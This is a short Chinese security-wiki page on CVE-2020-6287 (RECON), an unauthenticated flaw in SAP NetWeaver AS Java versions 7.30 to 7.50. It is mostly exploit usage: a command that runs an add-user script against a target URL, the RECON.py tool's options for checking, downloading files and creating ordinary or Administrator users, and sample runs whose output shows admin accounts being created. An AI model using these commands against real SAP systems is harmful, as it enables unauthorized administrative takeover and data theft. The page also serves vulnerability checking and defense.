menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right SAP chevron_right CVE-2020-6287 SAP NetWeaver AS JAVA 任意管理员添加
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2020-6287 SAP NetWeaver AS JAVA 任意管理员添加

    影响版本:

    • 7.30
    • 7.31
    • 7.40
    • 7.50

    exp(sap-CVE-2020-6287-add-user.py):

    python .\sap-CVE-2020-6287-add-user.py http://vulIP:50000/ test123 test@123123

    exp2(RECON.py): chipik/SAP_RECON Just point SAP NW AS Java hostnmae/ip.

    There is additional options:

    1. -c - check if SAP server is vulnerable to RECON
    2. -f - download zip file from SAP server
    3. -u - create user SAP JAVA user with Authenticated User role
    4. -a - create user SAP JAVA user with Administrator role

    Ex.: Download zip file

    ~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved

    Ex.: Create SAP JAVA user

    ~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created

    Ex.: Create SAP JAVA Administrator user

    ~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created

    @duc-nt
    @chipik